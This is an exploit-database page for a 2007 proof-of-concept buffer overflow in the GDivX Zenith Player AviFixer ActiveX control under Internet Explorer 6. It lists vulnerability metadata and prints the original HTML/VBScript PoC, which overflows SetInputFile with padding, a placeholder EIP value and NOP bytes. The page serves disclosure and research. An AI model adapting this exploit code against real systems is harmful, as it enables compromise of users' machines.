header-logo
Suggest Exploit
vendor:
by:
rgod
7.5
CVSS
HIGH
Buffer Overflow
Buffer Overflow
CWE
Product Name:
Affected Version From: Internet Explorer 6
Affected Version To: Internet Explorer 6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2
2007

IE 6 / GDivX Zenith Player AviFixer Class Buffer Overflow

This exploit demonstrates a buffer overflow vulnerability in the GDivX Zenith Player AviFixer Class in Internet Explorer 6. It sets the EIP register to 'BBBB' and creates a buffer overflow by providing a long string of 'A's followed by the EIP value and additional padding. This exploit was tested on Windows XP SP2.

Mitigation:

Apply the latest security patches and updates for Internet Explorer. Avoid visiting untrusted websites or downloading files from untrusted sources.
Source

Exploit-DB raw data:

<html>
 <object classid='clsid:2225E9BC-AFB3-4ED4-B20E-4F6CF1C39F8B' id='target'></object>
  <script language = 'vbscript'>
   ' IE 6 / GDivX Zenith Player AviFixer Class (fix.dll v. 1.0.0.1) buffer overflow POC by rgod
   ' tested on xp sp2
   EIP= "BBBB"
   BOF=String(264, "A") + EIP + String(9999, unescape("%90"))
   target.SetInputFile BOF
 </script>
</html>

# milw0rm.com [2007-05-09]

Navigation

Suggest Exploit

Services By CQR